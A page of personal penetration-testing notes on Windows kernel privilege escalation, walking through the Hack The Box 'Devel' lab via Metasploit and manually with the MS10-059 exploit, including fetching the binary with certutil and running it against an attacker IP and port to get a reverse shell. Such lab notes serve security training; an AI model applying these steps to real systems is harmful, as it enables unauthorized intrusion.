x/handbook
1
0
Fork 0
Code Issues Pull requests Actions Packages Projects Releases Wiki Activity
handbook/tools/5.Machine/2.Windows/Notes/3.Kernel-Exploits.md
Anton Nesterov af9011411c
vault backup: 2024-08-31 01:07:21
2024-08-31 01:07:22 +02:00

1.5 KiB
Raw Permalink Blame History

Overview

!image.BPHLW1.png !image.O2EHW1.png

  • The reason we need "system info" is because there are specific kernel exploits depending on the Windows build.
  • If we own the Kernel, we own the system - that's what we are trying to do.

Escalation with Metasploit (Example - Devel HTB)

  1. Background the meterpreter session2. Search and use the exploit you found by priv suggester !image.BPVLW1.png

  2. Search and use the exploit you found by priv suggester !image.GMWMW1.png

  3. Set the appropriate meterpreter session (and the other options) !image.T59QW1.png

  4. Run and get another meterpreter session! !image.ILWHW1.png

  5. Be root !image.1GM9V1.png

Manual Kernel Exploitation (Devel - HTB)

  1. Search for the specific kernel exploit in Google
  • ms10-015 doesn't work because we don't have GUI access
  • so keep working through them & researching each one
  • Rest of example is with MS10-059 (chimichurri exploit)

  1. Downloaded the .exe to attacking machine !image.59C9V1.png

  2. Set up Python HTTP server on attacking machine to host the file for victim to download

  3. Go to temp folder (likely have write access here) !image.ZQL8V1.png

  4. Download the file with certutil command (similar to wgeton Linux) !image.MLLGW1.png

  5. Run the command with proper syntax (ms.exe <attacker_IP> <attacker_port>) !image.PR0HW1.png

  6. On attacking machine, open another shell with the correct port !image.EEODW1.png

  7. Become root! !image.TYR6V1.png